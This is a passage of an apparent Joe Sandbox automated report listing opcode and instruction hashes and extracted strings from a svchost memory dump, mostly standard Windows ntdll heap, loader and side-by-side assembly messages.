                                                                              • Instruction Fuzzy Hash: C8F10235A04695EFCB25DF6AC480BAAFBF5FF09704F08805FE4969B282C774A945CB50
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                                              • API String ID: 0-3063724069
                                                                              • Opcode ID: 1652e4432f2c0496356dadf8ffb7b026805bff45b8f574c6c23ca6c1a6cad84f
                                                                              • Instruction ID: 01e6c9f6e19bbd619502a61e8576617ae89d1b05af0218fea09a585f921164e4
                                                                              • Opcode Fuzzy Hash: 1652e4432f2c0496356dadf8ffb7b026805bff45b8f574c6c23ca6c1a6cad84f
                                                                              • Instruction Fuzzy Hash: 89D1D572814395AFD721DB64C980BAFB7ECAF84714F04492FFA949B290E774C948C792
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                              • API String ID: 0-1700792311
                                                                              • Opcode ID: 83c3be018435cb1eab360c79bcaf07fc1a8cc66b953b8cf48365224eb40140fc
                                                                              • Instruction ID: 9e6f718e18ef580b00d92a16e974ea74100a23be4c80770890ca8b7f1d77a26f
                                                                              • Opcode Fuzzy Hash: 83c3be018435cb1eab360c79bcaf07fc1a8cc66b953b8cf48365224eb40140fc
                                                                              • Instruction Fuzzy Hash: 1ED1CC35500685EFCB26EF6AC540AAEFBF1FF5A704F08814AE4559B762C7B89941CB20
                                                                              Strings
                                                                              • Control Panel\Desktop\LanguageConfiguration, xrefs: 03A2D196
                                                                              • @, xrefs: 03A2D313
                                                                              • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 03A2D146
                                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 03A2D2C3
                                                                              • @, xrefs: 03A2D2AF
                                                                              • @, xrefs: 03A2D0FD
                                                                              • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 03A2D262
                                                                              • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 03A2D0CF
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                                              • API String ID: 0-1356375266
                                                                              • Opcode ID: a53b2ce46afe2029fd3e0496936f941aec567b482aeede95d32d6e795c25d485
                                                                              • Instruction ID: af6a3e45794e8b79c273eaf285537dba7fd3ca2d260ec09f6c71290b060196fe
                                                                              • Opcode Fuzzy Hash: a53b2ce46afe2029fd3e0496936f941aec567b482aeede95d32d6e795c25d485
                                                                              • Instruction Fuzzy Hash: 46A16A719083559FD721DF28C984B5BBBE8BB84715F004D2FF9A89A241E774D908CF92
                                                                              Strings
                                                                              • minkernel\ntdll\sxsisol.cpp, xrefs: 03A97713, 03A978A4
                                                                              • !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT), xrefs: 03A97709
                                                                              • [%x.%x] SXS: %s - Relative redirection plus env var expansion., xrefs: 03A976EE
                                                                              • Internal error check failed, xrefs: 03A97718, 03A978A9
                                                                              • sxsisol_SearchActCtxForDllName, xrefs: 03A976DD
                                                                              • @, xrefs: 03A49EE7
                                                                              • Status != STATUS_NOT_FOUND, xrefs: 03A9789A
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT)$@$Internal error check failed$Status != STATUS_NOT_FOUND$[%x.%x] SXS: %s - Relative redirection plus env var expansion.$minkernel\ntdll\sxsisol.cpp$sxsisol_SearchActCtxForDllName
                                                                              • API String ID: 0-761764676
                                                                              • Opcode ID: c29e3fabf5cd050da0e0e49ba120c2a177e52bc2fe0181c03362212982bcfc9d
                                                                              • Instruction ID: 8bb8fa584887a8244383dd2dc6b3bf1e58374753a0c2d42032729b1f74172e33
                                                                              • Opcode Fuzzy Hash: c29e3fabf5cd050da0e0e49ba120c2a177e52bc2fe0181c03362212982bcfc9d
                                                                              • Instruction Fuzzy Hash: BC127E74A002259FEF24CF58C881AAEB7F4FF89714F1884ABE845EB351E7359851CB64
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                              • API String ID: 0-1109411897
                                                                              • Opcode ID: bf434be5520fb9ab46d5021b9a85015def67e22f0c38b560d7709f0e13be9f2b
                                                                              • Instruction ID: 4f9bc63339380d25002105fc4fc8d784829f6e2765a09016fd8d8e1ed9b2046a
                                                                              • Opcode Fuzzy Hash: bf434be5520fb9ab46d5021b9a85015def67e22f0c38b560d7709f0e13be9f2b
                                                                              • Instruction Fuzzy Hash: 6FA22A75E056298FDF64DF19CD88BA9B7B5AF4A304F1442EBE809A7250DB349E81CF40
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                              • API String ID: 0-523794902
                                                                              • Opcode ID: 16c4044031f5d8853c8f4f70e4662a210e4548c60b4a0dba66b783665b19f433
                                                                              • Instruction ID: d7b6a3aed338b33dc7b3751e45d7c2ed532e8014a0644a1eecbbd35f2054a1e6
                                                                              • Opcode Fuzzy Hash: 16c4044031f5d8853c8f4f70e4662a210e4548c60b4a0dba66b783665b19f433
                                                                              • Instruction Fuzzy Hash: D242CC75608391DFC715EF28C984A2ABBF5FF89604F084A6FE8968B391D734D841CB52
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                                                              • API String ID: 0-4098886588
                                                                              • Opcode ID: cf74fb4dcc7e045557643824e69456ba336b30ba71bfbc8de4ad1d71cf45dec3
                                                                              • Instruction ID: 42a0e699015464ab06b8260121f379c540bda2dfad14169db5dd8275e8af3a19
                                                                              • Opcode Fuzzy Hash: cf74fb4dcc7e045557643824e69456ba336b30ba71bfbc8de4ad1d71cf45dec3
                                                                              • Instruction Fuzzy Hash: D032B175E04269CFEF25CB14C894BEEB7BAAF46340F1841EBE449A7290D7719E818F50
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                              • API String ID: 0-122214566
                                                                              • Opcode ID: 7c0c5fecb97aff0ff6f48800748cf3a0e728a147769c3cceb80d62d223ef7d2e
                                                                              • Instruction ID: 7495ef8efd58544266c5bc43d8eb5401155a8a98af24a1ddc3ce7af080772324
                                                                              • Opcode Fuzzy Hash: 7c0c5fecb97aff0ff6f48800748cf3a0e728a147769c3cceb80d62d223ef7d2e
                                                                              • Instruction Fuzzy Hash: F6C12B35A00215ABDF24CB69C880BBEB7B9AFD5310F18416FE845AF791E7B4D944C3A1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                              • API String ID: 0-792281065
                                                                              • Opcode ID: 734dff4960eda31b954d31bdc0b14f960f73679e7c349e9349c32ff42e6814ff
                                                                              • Instruction ID: 85e0079dcac2be84fcc564ce788137faf3e53201d336056493d273d4c4c2c2fd
                                                                              • Opcode Fuzzy Hash: 734dff4960eda31b954d31bdc0b14f960f73679e7c349e9349c32ff42e6814ff
                                                                              • Instruction Fuzzy Hash: C6915836A00B149FDB34EF19DA48BAEB7B4FB55B18F08066FE8146B791D7B49801C790
                                                                              Strings
                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 03A6C6C3
                                                                              • Unable to build import redirection Table, Status = 0x%x, xrefs: 03AA81E5
                                                                              • LdrpInitializeImportRedirection, xrefs: 03AA8177, 03AA81EB
                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 03AA8181, 03AA81F5
                                                                              • Loading import redirection DLL: '%wZ', xrefs: 03AA8170
                                                                              • LdrpInitializeProcess, xrefs: 03A6C6C4
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                              • API String ID: 0-475462383
                                                                              • Opcode ID: 00b0c24b626c3f31de59535f5be230b379cf9ba889448194c91431231c13b874
                                                                              • Instruction ID: 680eb332a7dee1985c71fd4fa187afdd8fdb8fa68a86f553cd3659e7cfe6deaa
                                                                              • Opcode Fuzzy Hash: 00b0c24b626c3f31de59535f5be230b379cf9ba889448194c91431231c13b874
                                                                              • Instruction Fuzzy Hash: 8331F77A644701AFC224EF2CDE45E2AB7A4EF84B24F04095AF8855B391D724EC04C7A2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$AVRF: Verifier .dlls must not have thread locals$KnownDllPath$L$\KnownDlls32
                                                                              • API String ID: 0-3127649145
                                                                              • Opcode ID: 3398d8dea2242e0086e6b4aeecfd57d2118ad879b6e1b9867c5e640d79389e08
                                                                              • Instruction ID: 3206126e9fc6a719954f92e822b291ea42a7303bf0b96b2a9f26db4c3c63b0c3
                                                                              • Opcode Fuzzy Hash: 3398d8dea2242e0086e6b4aeecfd57d2118ad879b6e1b9867c5e640d79389e08
                                                                              • Instruction Fuzzy Hash: AE325675A007199BDB60DF25CD88BDAB7F8FF48300F1046EAE509AB251DB70AA84CF50
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
                                                                              • API String ID: 0-3393094623
                                                                              • Opcode ID: 33ae96f6f1ba073717aad32fb8344dc0e30a9e74e46f4e1ddd09baa487c9d5b6
                                                                              • Instruction ID: f9b7b65b0dadf3073d1539f0a459caae53b5e913938f7574ea912c36683f73f8
                                                                              • Opcode Fuzzy Hash: 33ae96f6f1ba073717aad32fb8344dc0e30a9e74e46f4e1ddd09baa487c9d5b6
                                                                              • Instruction Fuzzy Hash: 0A0257719083418FD720CF64C184BABBBE5BFC9704F48892FE9999B250E770D855CBA2
                                                                              Strings
                                                                              • Kernel-MUI-Number-Allowed, xrefs: 03A55247
                                                                              • Kernel-MUI-Language-Disallowed, xrefs: 03A55352
                                                                              • Kernel-MUI-Language-SKU, xrefs: 03A5542B
                                                                              • Kernel-MUI-Language-Allowed, xrefs: 03A5527B
                                                                              • WindowsExcludedProcs, xrefs: 03A5522A
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                              • API String ID: 0-258546922
                                                                              • Opcode ID: b0ce2ea30638340fdadfcbe1b97d5f839abe5b706f779510a39353db82819641
                                                                              • Instruction ID: 8167ae1fbec74c7da047b3ce5bdb098d24b411ada9967fa97366f6c87b0d94de
                                                                              • Opcode Fuzzy Hash: b0ce2ea30638340fdadfcbe1b97d5f839abe5b706f779510a39353db82819641
                                                                              • Instruction Fuzzy Hash: 4AF13B76D00218EFCF15DF98D984AAEBBF9FF49650F15405BE902AB250D7749E01CBA0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                                              • API String ID: 0-2518169356
                                                                              • Opcode ID: 41d542eff2bd4030d099f69b2eb153f925089474e372be50fdf15d409c015334
                                                                              • Instruction ID: 507e0aa0a03d4a5a1c344dde915725ba08941310cd5429f481a40428b6380a5b
                                                                              • Opcode Fuzzy Hash: 41d542eff2bd4030d099f69b2eb153f925089474e372be50fdf15d409c015334
                                                                              • Instruction Fuzzy Hash: 6991BF76D006199FCB20CFA9C881AFEB7B8EF4A710F59416AE811EB352D735D901CB90
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                              • API String ID: 0-1975516107
                                                                              • Opcode ID: b38e976ea0c6e8cb0678a297fbe06a229d7379977adf3577e89304f1b9716c4e
                                                                              • Instruction ID: 29bacc90396f13a2dd5c2222613d488ca9e0229281b992e807e20ee22a74675a
                                                                              • Opcode Fuzzy Hash: b38e976ea0c6e8cb0678a297fbe06a229d7379977adf3577e89304f1b9716c4e
                                                                              • Instruction Fuzzy Hash: 6A51EE75A00345DFDB24EFA8C68479DFBB1BF49318F28425BE8056B6A5D774A881CB80
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                              • API String ID: 0-3061284088
                                                                              • Opcode ID: 0e107cebf052e6cfb8a99e752ad672cb97568d2f69a4711ed8f6069d5db4ce08
                                                                              • Instruction ID: 7ec83e9d1a2cd6e4eb0ffcfb69d5360722ebd41f449ce80cfa2d314a7c9a3658
                                                                              • Opcode Fuzzy Hash: 0e107cebf052e6cfb8a99e752ad672cb97568d2f69a4711ed8f6069d5db4ce08
                                                                              • Instruction Fuzzy Hash: 8A01D876148660EFD22AF71DE519F96BBE4EB42B70F18405BE0104BAA2CBA59C84D570
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                              • API String ID: 0-3178619729
                                                                              • Opcode ID: 5a5605a92d66b8095c5b4ddb10633a8a5322f00d3f0709557a2cc598600acad1
                                                                              • Instruction ID: 5c720f475052159e6a3f4be9f1f10e72eb7c28b4cfc0f7f7fac978905813a9a4
                                                                              • Opcode Fuzzy Hash: 5a5605a92d66b8095c5b4ddb10633a8a5322f00d3f0709557a2cc598600acad1
                                                                              • Instruction Fuzzy Hash: 69139D70A00655DFDB25CF68C4807A9FBF5BF89304F1881AED859AB381D73AA945CF90
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                                              • API String ID: 0-3570731704
                                                                              • Opcode ID: 1cb36fba9d1f4bec82de3208c3d52f0a6281a7d16f338364539868be9ace5bb4
                                                                              • Instruction ID: 6cafc36fdc16cf96f1734caedb69ab4e6aab6f98a775d083496654a5038cbf6a
                                                                              • Opcode Fuzzy Hash: 1cb36fba9d1f4bec82de3208c3d52f0a6281a7d16f338364539868be9ace5bb4
                                                                              • Instruction Fuzzy Hash: 43923875E00228CFEB25CB18C981BA9B7B5BF85314F1981EBE949AB350D7349E80CF51
                                                                              Strings
                                                                              • SsHd, xrefs: 03A4A885
                                                                              • RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section., xrefs: 03A97D03
                                                                              • SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p, xrefs: 03A97D39
                                                                              • SXS: String hash collision chain offset at %p (= %ld) out of bounds, xrefs: 03A97D56
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.$SXS: String hash collision chain offset at %p (= %ld) out of bounds$SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p$SsHd
                                                                              • API String ID: 0-2905229100
                                                                              • Opcode ID: d9367a8ffcf87c15cd14c72590af554d5416ad288f675ececd56713960db17fb
                                                                              • Instruction ID: 9e213cd229c4ac4a1af075da0219763e25527fa065368dafa9c31d95ac12252d
                                                                              • Opcode Fuzzy Hash: d9367a8ffcf87c15cd14c72590af554d5416ad288f675ececd56713960db17fb
                                                                              • Instruction Fuzzy Hash: 93D17C76A402199BDF24CF98C9806ADF7B5FF88310F19416BE845AB352D371D951CBA0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                              • API String ID: 0-3178619729
                                                                              • Opcode ID: b8d3ee56b7d18420d42213645f920625798aa944010edd581d22cdfdb8a55610
                                                                              • Instruction ID: 022eb5a9025751643c2a21e450b86c452660aa0534101605dc41ab9c792221bf
                                                                              • Opcode Fuzzy Hash: b8d3ee56b7d18420d42213645f920625798aa944010edd581d22cdfdb8a55610
                                                                              • Instruction Fuzzy Hash: 28E29074A00655DFDB28CF69C490BA9FBF1FF89304F1881AED849AB385D735A845CB90
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                              • API String ID: 0-379654539
                                                                              • Opcode ID: 496e732f0d58218b9c070a2a63866c1cab30399565341ce71f91cef90a6f1142
                                                                              • Instruction ID: 584432be85fe13b77e3d5cf4e764cb4d7bb944404988cc87f2b08d69c3087c2e
                                                                              • Opcode Fuzzy Hash: 496e732f0d58218b9c070a2a63866c1cab30399565341ce71f91cef90a6f1142
                                                                              • Instruction Fuzzy Hash: A8C177742083969FDB11CF28C144B6AB7F4AF86704F04896FF8D69B250E739C949CB56
                                                                              Strings
                                                                              • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 03A955AE
                                                                              • HEAP[%wZ]: , xrefs: 03A954D1, 03A95592
                                                                              • HEAP: , xrefs: 03A954E0, 03A955A1
                                                                              • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 03A954ED
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                              • API String ID: 0-1657114761
                                                                              • Opcode ID: 006ef1e2a29b20a99e4d5047df1b0c5afa3263a40c3f72ea3193dff072ae5c7d
                                                                              • Instruction ID: 4a064eaf1d898d18c847a18d04cc775828ad5146751f57b2763fb9dbc82507ee
                                                                              • Opcode Fuzzy Hash: 006ef1e2a29b20a99e4d5047df1b0c5afa3263a40c3f72ea3193dff072ae5c7d
                                                                              • Instruction Fuzzy Hash: CAA1E034A04205DFDB24DF28C845BBAFBF5AF95300F18866FD5968B782D734A844EB90
                                                                              Strings
                                                                              • SXS: %s() passed the empty activation context, xrefs: 03AA21DE
                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 03AA22B6
                                                                              • .Local, xrefs: 03A628D8
                                                                              • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 03AA21D9, 03AA22B1
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                              • API String ID: 0-1239276146
                                                                              • Opcode ID: 89297d2bfd422c8abda2032f2ae83d2927a180f4034677c3a950d4331de27cbb
                                                                              • Instruction ID: d00d9de2c67835240671e6311fa6dd06428eb94ea12ffee7cfe1f8a5815cedb7
                                                                              • Opcode Fuzzy Hash: 89297d2bfd422c8abda2032f2ae83d2927a180f4034677c3a950d4331de27cbb
                                                                              • Instruction Fuzzy Hash: F7A180369402299BDB24CF68DC84BA9B3B5BF58314F1949EFD848AB351D7309E84CF90
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                              • API String ID: 0-2586055223
                                                                              • Opcode ID: e9c0ff3c72fd4e6c746eaa3a1e8d3c732e6b67b9c0cadc108a075ed893497d1b
                                                                              • Instruction ID: aa296583c16daa479120f820bc5dcb9d0a36c31c6ecbe388f68d05c407762d64
                                                                              • Opcode Fuzzy Hash: e9c0ff3c72fd4e6c746eaa3a1e8d3c732e6b67b9c0cadc108a075ed893497d1b
                                                                              • Instruction Fuzzy Hash: 3561E076205780AFD721EB28C944F67BBF9EF84714F08086AF9558B391D734E941CB61
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                              • API String ID: 0-336120773
                                                                              • Opcode ID: 4b0d010567552ee9ff7948e19382012f010a8f1fc6dc0d23015e9d7e45f874f2
                                                                              • Instruction ID: 5640fa5e1c611e059691ae399d2b88f17617e2d2565026375bfdb02ca5201fef
                                                                              • Opcode Fuzzy Hash: 4b0d010567552ee9ff7948e19382012f010a8f1fc6dc0d23015e9d7e45f874f2
                                                                              • Instruction Fuzzy Hash: 6F31CB35600220EFD719EB98CD85FAAB7E8FF09764F18016BE451DB291E670EC41CA65
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
